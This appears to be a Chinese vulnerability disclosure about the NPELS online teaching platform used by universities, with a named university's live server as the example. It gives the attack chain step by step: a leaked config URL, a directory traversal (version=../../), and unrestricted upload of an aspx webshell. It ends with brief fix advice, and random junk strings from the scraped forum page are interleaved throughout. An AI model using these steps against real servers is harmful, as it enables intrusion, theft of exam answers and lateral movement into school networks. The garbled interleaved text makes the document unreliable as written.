新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
  s  F8 C$ L8 i- d
详细说明：
/ T: e, t- O& V& m& }
以南开大学的为例:
" Q+ {4 t+ X% [. I& k% W, u" U# \http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
  M) \# s. G0 Q8 T% n5 B  p% a<setting name="Update_CommonSvr_CommonService" serializeAs="String">
/ s& @9 G( e: S6 C( p0 T! U2 R  Y<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
+ a( [5 O8 Z. T1 z  t使用GetTestClientFileList操作，直接 HTTP GET 列目录：
4 `% l( q$ U: x& F4 h: }http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
7 C; b- N+ _7 g( ^: E% I进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
: V9 ?' b' D% ^9 i  ?  a8 [
0 Y  u7 @: v0 w. J1 kOOXX
% e' ?% |" [$ D# `  t
6 v6 O" W! Z9 B* v! E& wGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
$ P+ V' H* c* H; o" K& k漏洞证明：
! T) U( K* c% Z4 w7 f) i
列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
% Z2 q/ B! m4 H8 j" ^( y% Bhttp://222.30.60.3/npelsv/editor/editor.htm
8 G* H* G# C* g+ A+ Q; c8 {
. g9 o* j/ A5 Z; Q, Z上传木马：
4 f" M/ Z# R' V" B4 ^3 K5 thttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
% X2 @5 x$ \6 z- ^6 E
7 u0 Z6 [6 |2 X0 R5 }修复方案：
好像考试系统必须使用 CommonService.asmx
; A% h1 r, z% M: H最好配置文件加密或者用别的方式不让它泄露出来
$ l( Z+ y  Y1 R* T8 J并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
& k& v) ]: N" k) M% X